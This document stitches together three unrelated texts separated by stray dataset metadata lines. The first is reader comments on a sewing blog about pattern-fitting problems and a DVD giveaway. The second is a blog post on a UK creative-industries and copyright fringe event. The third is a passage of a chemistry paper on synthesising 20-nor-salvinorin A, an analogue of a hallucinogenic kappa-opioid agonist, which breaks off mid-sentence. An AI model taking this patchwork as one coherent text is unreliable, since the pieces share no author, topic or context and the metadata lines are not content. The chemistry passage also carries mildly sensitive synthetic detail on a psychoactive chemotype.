sizing. SharonApril 9, 2016 I have used this method for many years, since Nancy introduced it. Love it, and find it works well for me. MrlanieApril 9, 2016 I am petite and struggle with making tops that fit across my shoulders without gaping at the top, mid back while maintaining the correct bust size. Would love tips! DebraApril 9, 2016 As always, great tips! I have been a fan of your pivot and slide method since the 1980′s when I ordered your project sheets. It has been my go to method for fitting in garment construction ever since. Linda WJanuary 17, 2016 I used my “right size measurement” for a shirt I’m making pinned it together & it actually looks like it fits. I also found a great way to duplicate pattern pieces purchase table cloths made with dunicel (Berkeley Jensen) makes them 50″x108″ (127cm x 274.32cm) they come 2 in a package. Acts like fabric much easier to handle than tissue paper. Happy Sewing GraceJanuary 16, 2016 Thank you so much for these programs about pattern alterations! I learned a great deal from the book you published in the 1980s, and it’s great to have a refresher and some updated techniques. My problem adjustment is altering for very plus sized women (I build costumes for community theatre), particularly modifying for DD+ busts while keeping the shoulder/armhole from being too large on standard and princess bodices. I would also like to know how to draft a trouser pattern for a protruding bottom, without making the trouser leg far too wide. Thank you! Linda WNovember 24, 2015 I measured across arm to arm crease got 14.5″ which puts me @ a misses pattern size 16. The clerk at Joann Fabrics told me I needed a woman’s size so I cut out a woman’s size 24 pattern for my pants (they’re HUGE) I understand adding the difference in measurement to each side but how do I adjust the crotch seams Patsy DobbsNovember 24, 2015 My bust is smaller than it should be to be in proportion with my waist. Also waist not in proportion to hips.Then there is the problem tummy now that I’m 81, which doesn’t help. When I was much younger, I wrote McCalls pattern company about this problem and got no real help as they suggested a woman’s pattern size that was MUCH too large (I weighed 130 then) and too short waisted (I’m 5’8″). Lord only knows what they would suggest now! I need help in the worst way! Mary R.November 24, 2015 I am overweight due to the steroids I must take to keep my illness in control. Nothing fits, including store bought clothes. Your method will surely help to solve my fitting problems. Hope you are feeling better. Have a blessed Thanksgiving. KarenNovember 24, 2015 I have a rounded upper back and a large tummy. As I’ve aged nothing fits ready to wear or pattern made. The videos were very helpful and I think the book might give me the rest of the answers. JanNovember 23, 2015 Narrow shoulders and generous hips. DeboraNovember 23, 2015 I always look forward to your emails. Thanks for the continued work you & your staff do. As you can see, you’re a blessing & inspiration to many of us here. Continued success & health to you. I want to sew for my beautiful niece, however, she is tall & hippy & I usually sew for the beanpole type grandkids. Thanks! Anne Z.November 22, 2015 Hi, I have never been formally taught how to fit patterns correctly. This information is fabulous!!! I always struggle with the bust and the arm holes. Sue VincentNovember 21, 2015 Wow this is so helpful. I learned to sew from my mom who was an amazing seamstress. I found two old dress patterns of hers and decided to make a dress for myself using them. It was hard to fit correctly because she was bustier and shorter waisted than I am. Fortunately, I was able to “make it work” and the dress was beautiful but this info would have made it much easier. Thank you. GingerNovember 21, 2015 Blending sizes some times causes my problems. EnidNovember 21, 2015 I found a pattern that I like; however, the largest size is several sizes to small for me. I would love to be able to make the adjustments. bobbie CalgaroNovember 21, 2015 Most patterns today have sleeves that are too small to fit my arm. I can’t see how they think a woman with a 40″ bust has a less than 14 1/2″ arm circumference. It’s frustrating and cutting the sleeve apart is messy and hard to work with. Donna F.November 21, 2015 Thank you, Nancy! Your pivot points were an epiphany; especially for the armscye! I will also use your method for moving the dart! I look forward to Part II! LindaC in AZNovember 21, 2015 One of my pattern puzzlers is narrow, very square shoulders. I’m so happy to see a program on fitting patterns! Thank you. AnnNovember 21, 2015 I weigh 136#. I have narrow shoulders, thin neck, but ample chest. I have loads of problems finding RTW tops and blouses that don’t have gaposis at the neck along with hanging down armpits. If I find something that fits my shoulders it is invariably too tight in the chest. I hope you will address (if any) differences in altering a knit pattern. Thx for doing a couple shows on altering patterns. AnnNovember 21, 2015 I weigh 136#. I have narrow shoulders, thin neck, but ample chest. I have loads of problems finding RTW tops and blouses that don’t have gaposis at the neck along with hanging down armpits. If I find something that fits my shoulders it is invariably too tight in the chest. I hope you will address (if any) differences in altering a knit pattern. Thx for doing a couple shows on altering patterns. MC O'NeillNovember 20, 2015 My copy of your fitting book from years ago is now falling apart – several pages are no longer attached to the spine. I’ve used it so much and it has never failed me. I expect the new one with the DVD will be even better! EsseNovember 20, 2015 I need help! Petite, large bust. If bust fits, armpits are huge. Ruth Ann NewnumNovember 20, 2015 This was very informative and since are ASG Group is now working with 4-Her’s this will be a very helpful video on Pattern Fitting. Thanks for your sharing and teaching us. This fitting problem has always been somewhat of a puzzle, even though I have done some alterations and that helps clear up some of the puzzle. But would really like to make a garment for myself or others and have a good fit. This book would be a great help. Cecilia FayeNovember 20, 2015 Pear-shaped–impossible to fit! Virginia O'DonnellNovember 20, 2015 As I age and shrink in heighth and expand in the tummy, I have a terrible time buying clothes and would love to make my clothes again. This method could be my answer. Being a large woman I find there are few patterns available. Mostly what I get is “lose weight”, but I have proved it’s due to real medical reasons. Still, I would like to dress nicely and make my clothes. I have to enlarge everything except a few patterns which I have to alter to fit, and it’s not always easy of successful. I would love to have the confidence to just adjust and cut out without the worry that I’d doing it right. Kim HNovember 20, 2015 I love the method you use for fitting Nancy! I is so simple and effective. I would certainly welcome this into my library. Praying for your full recovery Nancy. Hugs, Kim SusanNovember 20, 2015 As my body has changed with age I am faced with new/different fitting challenges. Thanks for the refresher course and reminder of ways to tweak the fit that I did not need to do when I was younger. SerenityNovember 20, 2015 Isn’t it amazing to see how many posts, just how many of us, no matter how much time and energy and expense we put into fitting, continue to be disappointed. Something is totally wrong. I’m hoping with this method, the mystery of fit will be resolved, once and for all. Cassy L.November 20, 2015 My body and pattern sizing has changed has changed from when I used to make all my own clothing. Would enjoy gaining confidence in choosing pattern sizes that would fit now. ReneaNovember 19, 2015 I use to make all my clothing and never had a problem of things fitting. I have just started to make some tops for myself again and they never end up fitting. Not sure what I am doing wrong or if patterns have done some size shifting. Thanks for the great giveaway. Mary WippoldNovember 19, 2015 I am short and have wide shoulders and a small bust. It is very hard to find patterns that fit. Grannie ConnieNovember 19, 2015 We are hoping you will soon be healthy. Since God “blessed” me with a generous bust, I must alter patterns to fit. I haven’t found a reliable method, but this method seems promising. I would love to win the DVD so I can finally make a blouse that fits properly. My daughter and granddaughter are ” blessed” also, so all three of us will benefit from this lesson. Thanks for all the lessons you have shared. Lori MNovember 19, 2015 My problem is finding the right waist measurement…I pick the pattern size for the bust, but then for a blouse or dress…I cannot figure out where to adjust for the waist to hip…I thank you for a great giveaway….. NancyNovember 19, 2015 I’m presently challenged with fitting an armhole and a short sleeve. DeborahNovember 19, 2015 On top it is solving the “hanger” area of my narrow shoulders & neck but then being able to scale out for the large bust, tummy, hips all while keeping the armscye area neat and smooth. On the bottom I’d love to get rid of smiles & frowns by perfecting the crotch length & depth… and waist…. um, where exactly is my waist?? They either stay up right under my bust or hang on my hips. My rise is then too short… teen low rise jeans come up to my belly button. I’m trying to understand that I need to pick a pattern for my high bust measurement, and then grade out for bust & hips. But so far, all my efforts have resulted in shoulder seams that fall off my shoulders, and often too wide neck openings. I’m baffled about what I should do if I just cut off the width at the shoulders – do I need to change the sleeves then? So I’m definitely puzzled. Pam KingNovember 19, 2015 I have been trying to find a pattern that really fits, I am overweight and its hard to find patterns that really fit right. Donna G.November 19, 2015 Fitting pants is my biggest puzzler! Donna SchweitzerNovember 19, 2015 I used to make my kids clothes. I have not seen me anything for years because I am a plus size and I just don’t get it! HELP! Thank you. Kelly SasmanNovember 19, 2015 I would love to learn how to fit tops in the underarm area so that the lay is right across the bust and drapes nice. ROBIN, TXNovember 19, 2015 My daughter could sure use this! TinaNovember 19, 2015 Great info. I really need this. Leanda MayerNovember 19, 2015 I have to agree with the other comments that getting older makes fitting a much more difficult job. I know how much I appreciate you tackling this problem and would love to win this. Jan N.November 19, 2015 Many years ago I learned from you the alterations you show in the Part 1 video. Now that I’m older and a “little” fluffier, I need to learn how to make an adjustment for a fuller bust line. Diane CNovember 19, 2015 I would like to make pants because the ones I buy in the stores don’t fit right Sewing is a CHALLENGE!!!! Have RA-so crooked joints-a dowager hump CHALLENGE my getting attractive & nice fitting clothes…..Nancy,you have been my fairy godmother for clothes for years…& here you come with more great help.THANKS Shirley OwensNovember 19, 2015 I can’t tell you how difficult it is for me to make any garment that has sleeves. The size of my arms are at least two sizes larger than my bodice. They are this large all the way from shoulder to wrist. I wear long sleeves to camouflage them. I am just tired of gathered sleeves. I am experienced at making my own clothes since age 10. But I am baffled by this problem. Thanks for helping so many people. I pray that God will heal you so you may keep up the good work. You are very fortunate to have so many people who love you, including me. SavannagalNovember 19, 2015 I’m a beginning sewer. I signed up for an online class on pattern fitting and I had a hard time understanding what was going on. I’m definitely interested in seeing your show on fitting. Some day it would be nice to make garments that fit well, instead of just fit on. JoanieNovember 19, 2015 I am very excited to learn a way to fit pants. I have a large waist, smaller hips, no behind and average sized legs. My problem is if I make a pant to fit my waist they are huge in the hips and legs. If I make them for my hip size then they are too small in the waist. Help!!! Thank you. colletteNovember 19, 2015 My fitting problem: small frame and DDD bra cup size. BonnyeNovember 19, 2015 This summer I made a dress for my son’s wedding. The size I selected was too big on the top and too small on the bottom. With the help from my husband I was able to make a beautiful dress but I would like to have a good guide for future projects. Linda swansonNovember 19, 2015 As a teen patterns fit me perfect. The years have added lots of pounds and senior shoulders and quite a large girth. I don’t even buy ready wear Jo Ann BazarNovember 19, 2015 Am I relegated to dolman sleeves forever because as I’ve aged I developed rounded shoulders and a nice set of ‘bat wings ‘ on my upper arms but stayed the same width armpit to armpit. Barbara R.November 19, 2015 I’ve stopped making clothing altogether because of the fitting problems I’ve encountered. I would love to make something besides pajama bottoms! Bev MNovember 19, 2015 I used to be able to fit myself well, but now that I am older and a little larger, I am very uncertain. I usually allow too much extra fabric. Nancy’s methods should help me a lot. Carol SNovember 19, 2015 I am totally intimated when it comes to fitting clothing and I have given up. Thank you so much for the wonderful instructions; they give me renewed hope. I hope it will be me but congratulations to whomever wins the DVD; this will be an invaluable help. MaryNovember 19, 2015 Just what I have been looking for. I have stayed away from making clothing for myself because the fit is never right. Shelia WardNovember 19, 2015 I usually have a dummy pattern cut out first using what ever paper I have on hand then I piece it onto the person I ma making the piece and do any alterations that way. Time consuming but its easier than trying to cut a semi finished piece and making mistakes that are not reversible. Linda RupeNovember 19, 2015 I have been using your methods for years and recommend them to all of my students who are afraid of making clothing because of fit issues. Thank you for providing such a straightforward way of fitting. And thank you for being so humble in your approach to sharing your knowledge. You are a blessing and inspiration to many more than you will ever know. Barbara ClintonNovember 19, 2015 I used this method many years ago, making prom dresses for my daughters. The sizing really works! I am delighted to see it again as I am interested in making some garments for myself. I had wondered if the sizing charts had changed with patten sizes. Now I have a recent version to update Nancy’s book from years ago. If you sew clothing, YOU NEED THIS! MagaNovember 19, 2015 I wish the pattern companies would write the finished garment measurements (bust, waist and hips) on the envelopes. That would at least give us a fair chance to buy the right pattern size to start with. Sometimes I have to start with a size 10 sometimes a size 14 and work from there and that is within the same company’s pattern. They don’t make it easy for us from the start. I love the method Nancy teaches in her book Pattern Fitting with Confidence. It is one very dog-eared book in my library. I look forward to watching this 2-part series very much. Mary Anne AhtyeNovember 19, 2015 I’ve been sewing since age 12 (4 H) and look forward to continuing my sewing education. Sewing with Nancy provides that outlet. By the way been sewing for 55 years still passionate about sewing! Elizabeth LewisNovember 19, 2015 What a great method! I am constantly on the lookout for ways to improve the fit of my garments. StarlaNovember 19, 2015 Thanks for the tips — just starting to learn to use patterns. JoyceNovember 19, 2015 When I sew, I choose the size I think I need and don’t do any alterations because I really don’t know how. If the item fits, great, if it doesn’t, I put it in the pile of scraps. I have wasted more fabric that way. I love when I get something to fit! I am sure the DVD would be a big help. NellieNovember 19, 2015 I have trouble getting patterns to fit because my bust is smaller in proportion to my waist/hips area. This can be difficult to deal with, especially when dealing with a jacket. I would love to have Nancy’s DVD to help me get through these problems. Thank you for the opportunity! eginterNovember 19, 2015 I to have fiddled my pants pattern to fit,I have lost 46 lbs so now I have to refiddle my pattern,but think I have it done,I do not like the side pockets so looked at ready to wear and figured the pocket like jeans pockets, so now I need to do a top pattern,shoulders are to big,I find if if I have a top that fits I can lay my pattern on that (as I do not have a sewing buddy)and get the pattern to fit, thanks for all the,help,have been able to use up fabric and put it to use,always makes us feel better! Sue MartinNovember 19, 2015 My number one sewing issue. This info is just what I need. Can’t wait for Part 2. Thank you Nancy. Elaine RansomNovember 19, 2015 I’ve learned over the years to make pants that fit, but still have problems with shoulder and bust fitting. Other than knits ready to wear for me is virtually non existent. This video would be a big help. AudreyNovember 19, 2015 I like to make jackets, but often have to give them away because the shoulders don’t fit. I also have trouble getting the bust fitted properly. Amy GillNovember 19, 2015 Fitting pants is tough. Choosing the correct pattern is tougher. Janet DuffNovember 19, 2015 I am finding it impossible to get my sewing patterns to fit as I get older. This book would be a huge blessing. Finding clothes that fit well and modestly in stores seems to be impossible also. I’ll have to give this a try! SuAnne RNovember 19, 2015 I used to sew most of my own garments & for my kids. Now that they are grown and my figure is no longer a ‘standard’ size, not so much. I would really like to start again and solving the fit issue would be a great help. JadeNovember 19, 2015 I’ve promised my daughter I would try to make her a jacket or two that actually fit. This book is the tool I need to get started. VirginiaNovember 19, 2015 I really need to watch this episode. Fitting issues where should I start. I have very narrow shoulders vs large bust; no longer have a definable waist, normal hips but have a tummy due to 3 surgeries. As I’ve gotten older my shoulders are now curving forward. I purchase a size L & sometimes XL depending on the fit or lack of ease and the shoulders are usually 1 to 2 inches too big. Karen B.November 19, 2015 My biggest fitting issue is around the hips and waist. I know your book will simplify and make it all make sense. Thanks, Nancy. marie hannaganNovember 19, 2015 When I was younger I no problem fitting patterns. Since getting older everything has shifted and I cannot seem to get the right fit. LyndaNovember 19, 2015 I would love this program, I have not sewed clothes in 20 years and I am trying to get back into it, I my daughter in law wants to learn to sew so I am teaching her and I would like her to learn the right way of doing things this DVD would really help the both of us. have a great day! MarilynNovember 19, 2015 I love dressmaking, but stopped because when my body changed, I couldn’t get a nice fit. I think I can do it with your method! I’m excited and can’t wait to see the second video. Thanks! KayZeeNovember 19, 2015 Pants fitting has always been my biggest problem. I have been watching “Sewing With Nancy” for years and have learned many helpful fitting tips. Thanks, Nancy! Linda BuckmasterNovember 19, 2015 You are a true inspiration. I have learned so much from you over the year and have many of your older shows on VHS tape. I would love to see a segment on how to adjust the crotch length of a pant pattern, to make it longer. MickieNovember 19, 2015 I used to make all my clothes, and they fit perfectly. Now I have grandchildren and nothing fits except rtw stretch and that’s stretching it a bit. With tubs of beautiful designer fabrics I hope your method is my answer. What I would give to have a pants pattern that actually fit ME. . Judy RommelNovember 19, 2015 I have a hard time with drop shoulder patterns fit and sleeve lenght alterations. CyndiNovember 19, 2015 A book with step by step instructions is Wonderful! I have sewn for years but have never taken the time to properly fit a pattern. Thank you for the give away! Debra WilliamsNovember 19, 2015 I have always been hesitant to sew anything but loose fitting garments for myself because even after 40 years sewing I’m unsure how to fit properly. This is an awesome series and thank you so much for the opportunity to win! Jan HNovember 19, 2015 Sewing clothes that fit was always a mystery. With these techniques, I’ll be willing to try again and get stellar results! EldeneNovember 19, 2015 Thanks Nancy….you make it sound so simple! Love to sew! JoNovember 19, 2015 I would really like to make clothes for summer and would definitely love to win this to keep referring back while trying to sew. ValerieNovember 19, 2015 What a great video! Grandma taught me to cut the pattern, and I’ve always been hesitant to do that. I truly appreciate these instructions and can’t wait to see Part II. Martha MorganNovember 19, 2015 I cannot get a proper fit, especially since (menopause) I went from a B cup to a double D!!! I never was a “good” seamstress but I enjoyed trying, now I make quilts. RitaNovember 19, 2015 I would love to really learn to make clothing that doesn’t’ look home made.. Martha MorganNovember 19, 2015 I cannot make clothes for myself!!! I have (since menopause) gone from a B cup to a double D, no matter what I do I cannot get a proper fit – frustrating. I never was a “good” seamstress, but I liked to keep trying, now I make quilts. KateNovember 19, 2015 I’d love this program, fitting pants is traumatizing to say the least! I pray you are doing good, and hopefully walking and feeling much better. Have a blessed day!
null
minipile
NaturalLanguage
mit
null
A blog about technology and politics Capitalism and Creativity…yeah right I stayed in the Hilton to take part in a fringe event called “The economic contribution and growth potential of the creative industries” with speakers from the CBI, UK Music and UKIE. The meeting was planned to be chaired by Tom Watson, but Sion Simon stood in for him. Matt Fell from the CBI’s competitive markets division spoke first. He started by pointing out the bleeding obvious that creative is becoming digital; except it’s not! Most musicians make more money performing than they do through licensing their content. It’s industrial music and its parasitical lawyers, agents and accountants, and now it would seem commentators, lobbyists and analysts that need copyright and the corporate industrial cocoons. He also stated that there was a lack of government backing, absolutely look at the coalition’s abolition of the British Film Council and he called for strong intellectual property laws. I wanted to ask how they could be stronger! Joe Dipple of UK Music spoke next and called for a moratorium on copyright law reviews stating that further reviews would create uncertainty. She also announced that the UK was one of the top three music exporters. Interesting, I have been looking for these numbers for years. The top three countries are the USA, Sweden & the UK. I took the opportunity to ask at the end if these were net or gross exports, and the researchers were unclear, I was pointed at the BPI year book again. Is this still behind a paywall? Sion Simon made the joke, that Sweden was ABBA, but it probably includes Spotify; and one should ask if rights trading and distribution company can be called creative? During her speech she also blamed Google, and stated that they weren’t doing enough to combat piracy; obviously trying to build on some of the Labour leadership’s dislike of Google over both its tax affairs and its perceived favouring of the Tory party. Joe Twist of UKIE spoke last representing the Games industry, quickly making the point that Games and Gaming are different; one involves writing and selling software, the other is gambling. She shared some facts extolling the UK Games industry as a success, GTA V, the world’s most successful, or fastest selling game was written in Scotland, but she argues that the ONS statistics are not fit for purpose. Games does not show as an industry in the Standard Industrial Classification system which means we don’t know if they are net exporters, how many people they employ, what the GDP for the industry is. Would you swap consent for some time off the copyright protection period currently life plus 70 years? Would you support a fair use law? I was told that creative musicians were ordinary telco customers too and they deserved this support? I didn’t get a good answer for parts 2 & 3. Not sure that the part one answer was that good. There were a bunch of questions aimed mainly at UKIE but also at UK Music about inappropriate material for young users becoming available over that there internet. Joe Twist pointed out the significant investment that the world wide games industry have made into age guidance and censorship borrowed from the film industry. Don’t think the Music industry offers age guidance for their products. Maybe Legal All wrongs righted;linking is not approval; opinion is my own, not my employers, nor organisations that I belong to or support. Subscribe to my feeds There are two hyperlink buttons elsewhere in this sidebar which subscribe to the feed hosted from 1and1. Otherwise, try these links which are hosted at feedburner. The final button takes you to the blogshares page.
null
minipile
NaturalLanguage
mit
null
Drug overdose has become the leading cause of death for Americans under 50, driven largely by abuse of opioids.^[@ref1]^ The number of opioid-related deaths in 2015 surpassed 33 000,^[@ref2]^ which rivaled U.S. motor vehicle fatalities (35 000);^[@ref3]^ preliminary estimates from 2016 showed the annual rate continuing to rise.^[@ref4]^ To counter this epidemic, replacement of abused opioids with alternate pain therapeutics has emerged as an increasingly sensible goal.^[@ref5]^ One alternative anti-nociceptive target under investigation is the *kappa*-opioid receptor (κ-OR), a G protein-coupled receptor (GPCR) that is expressed throughout the nervous system and modulates consciousness, cognition, mood, and pain.^[@ref6],[@ref7]^ κ-OR-targeted analgesic development has focused on chemical property modification to generate peripherally restricted κ-OR agonists that lack central nervous system (CNS)-associated effects (e.g., hallucination),^[@ref8],[@ref9]^ or that promote biased signaling to minimize βarrestin-associated effects (e.g., sedation, dysphoria).^[@ref10]^ Among the more potent and selective agonists of the κ-OR is the brain-penetrant plant metabolite salvinorin A (SalA, **1**), which was identified as the primary psychoactive principle of *Salvia divinorum* and the most potent naturally occurring hallucinogen ever discovered.^[@ref11]^ As a result, SalA has been subject to semisynthetic modification^[@ref12],[@ref13]^ and total synthesis^[@ref14]−[@ref17]^ to adjust its chemical properties and/or promote biased signaling of the κ-OR. Notably, a thiocyanate analogue of SalA, RB-64, was shown to strongly bias toward G protein-coupled signaling.^[@ref18]^ While many semisynthetic analogues of SalA have been explored, the most prolific investigators recently noted that its "chemical liabilities\...narrow the available pool of viable chemical transformations."^[@ref13]^ For example, both semisynthesis and total synthesis encounter the configurational lability of the C8 carbon, which undergoes epimerization to a lower affinity isomer, 8-*epi-*SalA (154--356-fold loss in potency).^[@ref19]^ The reaction mechanism has been hypothesized to involve either ring-fragmentation/reclosure or simple enolization/reprotonation, with the bulk of evidence pointing to the latter.^[@ref20]^ However, the driving force for this *trans*- to *cis*-ring fusion has not been identified. We believed a combination of lactone planarity and C20 axial-strain to be responsible ([Figure [1](#fig1){ref-type="fig"}](#fig1){ref-type="fig"}). Analogy can be drawn to bridgehead (C10) methyl substitution of 1-decalone, which alters its *trans:cis* equilibrium ratio from 95:5 (C10--H) to 59:41 (C10-Me), driven by relief of the Me--C3--H~ax~ 1,3-diaxial interaction in the *cis*-isomer.^[@ref21]^ In order to stabilize the scaffold and attenuate epimerization, C20 of SalA might be resected through chemical synthesis, whereas semisynthetic removal would be difficult. The effect of this modification on the chemical synthesis itself is profound. ![Chemical instability of SalA. (A) Calculation predicts and experimentation has shown that SalA is disfavored to 8-epi-SalA approximately 2.5:1. This epimerization leads to significant loss in potency. (B) We hypothesized that the driving force for this epimerization is partly diaxial repulsion between C20 and H12, which is relieved in the *cis*-fused isomer, analogous to 10-methyl-1-decalone epimerization. Therefore, like 1-decalone, C20 (methyl) deletion should stabilize the SalA scaffold.](oc-2017-00488d_0007){#fig1} When strategic bonds (SBs)^[@ref22],[@ref23]^ in SalA are considered, the quaternary carbon (C9) bearing the C20 methyl reveals its importance. Two SBs in SalA take priority over other possibilities through the large reduction of complexity associated with their cleavage: a C12--O lactonization transform removes a heteroatom bond, ring, and stereocenter, and a C8--9 Michael transform removes a ring and three stereocenters, leaving a simple cyclohexanone. However, strategic prioritization of the C9--10 bond ignores stereocontrol, which suffers from the small potential energy calculated to separate subtargets **i**--**iii** from stereoisomers **iv**--**vi** ([Figure [2](#fig2){ref-type="fig"}](#fig2){ref-type="fig"}). As a result of the diaxial C19/C20 methyls, **i** and **iii** only favor the desired *trans*-decalone by a slim margin, and alkyne **ii** heavily favors the *cis*-decalone **v**. Notably, the four prior total syntheses avoid decalone intermediates altogether, despite their simplicity. Furthermore, precursor **3** contains a tetrasubstituted neopentyl alkene (C9=10) in which one substituent is a quaternary carbon, which is difficult to form due to A^1,3^ strain. ![Retrosynthetic analysis of **1** using strategic bond analysis. In addition to SalA scaffold destabilization, C20 destabilizes intermediate decalones and thus deprioritizes a key strategic bond (C8--9). C20 also frustrates precursor (**3**) synthesis as a substituent on a *tert*-alkyl tetrasubstituted alkene.](oc-2017-00488d_0001){#fig2} These problems abate if the target is treated not as static but as dynamic. The C9--10 bond becomes strategic for disconnection only by resection of the C20 methyl; C9--10 can be considered a "dynamic strategic bond." Three benefits emerge. First, the intermediate *trans*-decalin (**vii**) is calculated to predominate over the *cis*-isomer (**viii**), in contrast to **i**--**iii** vs **iv**--**vi** ([Figure [3](#fig3){ref-type="fig"}](#fig3){ref-type="fig"}). Second, the unsaturated cyclohexanone precursor would arise from condensation of a β,β-disubstituted cyclohexenolate with an aldehyde instead of a methyl ketone: the latter is a challenging reaction for which we found no precedent. Third, 20-nor-SalA is calculated to be more stable than its C8-epimer, reversing the configurational preferences of SalA itself. Taken together, there is only one reason not to resect C20: 20-nor-SalA is an unknown molecule with unknown binding affinity to the κ-OR. ![Effect of C20 deletion on scaffold stability. Treatment of SalA as a dynamic structure unlocks the C9--10 strategic bond (SB) for Michael transform by C20 deletion. Both decalone intermediates and the SalA scaffold itself are stabilized. The Michael reaction precursor (shown in [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}) becomes very easy to synthesize.](oc-2017-00488d_0002){#fig3} The prospect of undertaking a total synthesis of a complex molecule for application opioid receptor pharmacology with no guaranteed target affinity was daunting. So, we first explored the binding of 20-nor-SalA to the κ-OR *in silico*. However, the recent crystal structure of a κ-OR with antagonist JDTic^[@ref6]^ reflects an inactive state conformation of the binding pocket, specific to JDTic, and therefore is not well suited for binding of agonist SalA or its analogues. Therefore, we developed an active-like model of the κ-OR by using homology modeling based on an active state agonist-bound crystal structure of the mu-opioid receptor (μ-OR) (PDB ID: 5c1m). Receptor modeling included thorough sampling and optimization of the binding pocket side chains. The resulting active-like κ-OR receptor model was used to dock SalA and 20-nor-SalA using an all-atom global energy optimization algorithm, based on Monte Carlo sampling of the ligand and residue side chains within 4 Å of the ligand.^[@ref24]^ In the predicted docking models SalA and 20-nor-SalA bind in similar poses and with comparable binding scores (−28.76 and −27.42, respectively). In this binding pose 20-nor-SalA forms polar interactions with Q115^2.60^, Y312^7.35^, and C210^ECL2^ residues and, potentially, with N122^ECL1^ and/or R202^ECL2^ residues. The ligands also make extensive hydrophobic interactions with residues lining transmembrane 2, 3, and 7 including V118^2.63^, W124^ECL1^, I135^3.29^, and I316^7.39^ residues. This pose also satisfies the ligand interaction contacts derived from mutagenesis data for SalA.^[@ref25]^ In this pose, the 20-methyl group is directed toward the extracellular region with no apparent interactions with the receptor. This binding pose suggested comparable binding affinity for SalA and its 20-nor derivative. ![Calculated binding to the κ-OR. Docking mode of ligands 20-nor-SalA (orange) and SalA (green), shown in stick representations inside the kappa opioid receptor model (white colored cartoon representation). Residues in the ligand vicinity are shown in white-colored stick representation, and associated hydrogen bonds are shown in cyan colored dots.](oc-2017-00488d_0003){#fig4} These calculations provided a theoretical basis for investigation; justification for total synthesis usually depends on experimentally observed activity. However, knowledge of κ-OR affinity in this case required synthesis---a catch-22. A study to probe structure--activity relationships in SalA could not reach the nor-20 target,^[@ref26]^ so no empirical data was available. Nevertheless, we felt the potential benefits for therapeutic development outweighed the risk. Furthermore, the simplification imparted by C20 resection significantly improved material access by unlocking the C9--10 bond, whereas prior syntheses of SalA produced only small amounts of late-stage material over multiple operations (20--29 steps; 0.7--1% yield).^[@ref14]−[@ref17]^ Shown in [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"} is a 10-step synthesis of 20-nor-SalA. ![Chemical synthesis of 20-nor-salvinorin A. (A) Commercially available materials **4** and **5** are advanced in 10 steps to 20-nor-1 via diversifiable scaffold **11**, which is accessed in 7% overall yield. (B) Confirmed and hypothesized intermediates in the Michael (**8** → **9**), Heck (**11** → **12**), and lactonization (**12** → 20-nor-**1**) steps. TBS, *tert*-butyldimethylsilyl; DMS, dimethylsulfide; THF, tetrhydrofuran; HMPA, hexamethylphosphoramide; MsCl, methanesulfonyl chloride; DBU, 1,8-diazabicyclo(5.4.0)undec-7-ene; DMSO, dimethyl sulfoxide; LDA, lithium diisopropylamide; DMAP,4-dimethylaminopyridine; XPhos, 2-dicyclohexylphosphino-2′,4′,6′-triisopropylbiphenyl; DMF, *N*,*N-*dimethylformamide.](oc-2017-00488d_0004){#fig5} The synthesis commenced from Hagemann's ester (**4**), a commercially available building block common in terpene synthesis,^[@ref27]^ which appeared to be an obvious precursor to 20-nor-SalA via vicinal difunctionalization. Grignard reagent **5** was generated from commercially available *tert*-butyl(4-chlorobutoxy)dimethylsilane and used directly. However, early experiments to trap the sterically encumbered enolates resulting from conjugate addition proved fruitless, even with the simplest electrophiles like acetaldehyde. Enolate transmetalation with diethylzinc allowed enol silane formation and Mukaiyama aldol addition,^[@ref28]^ but always in low yield and never with electron-rich aldehydes. Instead, we found that addition of zinc chloride^[@ref29],[@ref30]^ and five equivalents of acrolein resulted in efficient formation of **6** as an inconsequential 6:1 mixture of allylic alcohols. Elimination of this alcohol was effected by mesylation, followed by ketone enolization by addition of DBU. These conditions initially delivered a mixture of (*E*)- and (*Z*)-dieneones, but isomerization mediated by reversible DBU addition occurred with prolonged reaction time to favor (*E*)-**7** with 20:1 selectivity. Subsequent steps for elaboration to 20-nor-1 involved careful choreography of (1) cyclization, (2) α-acetoxylation, (3) aryl appendage, and (4) lactonization steps, based on extensive reconnaissance briefly discussed here. An initial Heck arylation of **7** with 3-bromofuran or its boronic esters proved low yielding, and δ-(3-furyl)-substitution lowered the electrophilicity of the dienone toward nucleophiles. Several ketone α-hydroxylations competitively oxidized the furan ring if present, and Hagiwara's conditions for acetate installation by Mitsunobu stereoinversion^[@ref15]^ were inefficient and required purification from 20 equiv of PPh~3~ and 10 equiv of diisopropyl azodicarboxylate. The aldehyde, not carboxylic acid oxidation state, was chosen to engage in Michael addition due to its ease of enolization (or enamine formation) in the presence of the two other enolizable carbonyls. As a result, the final sequence involved *tert*-butyldimethylsilyl removal with 2 M HCl, followed by Swern oxidation of the deprotected alcohol to aldehyde **8**. Intramolecular Michael addition was carried out from the corresponding pyrrolidine enamine in methanol/tetrahydrofuran with added acetic acid. As the alcoholic cosolvent increased in size, the ratio of *trans-* and *cis-*decalone (see [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B) increasingly favored the undesired *cis-*decalin. Quench by potassium carbonate served to equilibrate an initially low ratio of *trans-/cis-*decalones to predominantly one isomer **9** (*cis-*decalone lower than 5% content by crude ^1^H NMR), which contained the contiguous stereopentad found in the salvinorin A scaffold. Substitution of methanol cosolvent with ethanol resulted in a dramatically slower equilibration. Pinnick oxidation of aldehyde **9** capped a facile route to diversifiable carboxylic acid (**10**, X-ray confirmation), which was successfully scaled to 5.3 g in a single pass. After much experimentation, we found only four steps to separate **10** from 20-nor-SalA, affording a convenient platform for eventual diversification to alter the chemical properties of the SalA chemotype. The first two of these steps address appendage of the equatorial acetate, which is challenged by the high selectivity for axial approach of electrophiles,^[@ref16]^ the difficulty of S~N~2 stereoinversion of these axial α-hydroxy and α-bromo cyclohexanones, and the high oxidation potential of furanyl intermediates. In some cases, α-debromination by acetate outcompeted substitution. These problems were solved by deprotonation of **10** with 2.1 equiv of LDA followed by Davis oxaziridine^[@ref31]^ addition, which generated in high diastereoselectivity the axial α-hydroxy-decalone. Subsequent acetylization occurred at both the alcohol and the carboxylic acid; warming this reaction mixture led to equilibration to favor the equatorial acetate without affecting the stereochemistry at any other position. Careful aqueous workup was performed to decompose the mixed anhydride at high pH and recover the carboxylic acid at low pH, while sparing the acetate from cleavage during these operations. The carboxylic acid itself was found to be crucial for the Heck arylation with 3-bromofuran. Early experiments to arylate the electronically unbiased olefin of aldehyde **9** surveyed a range of palladium sources, oxidants, ligands, solvents, and bases, under both 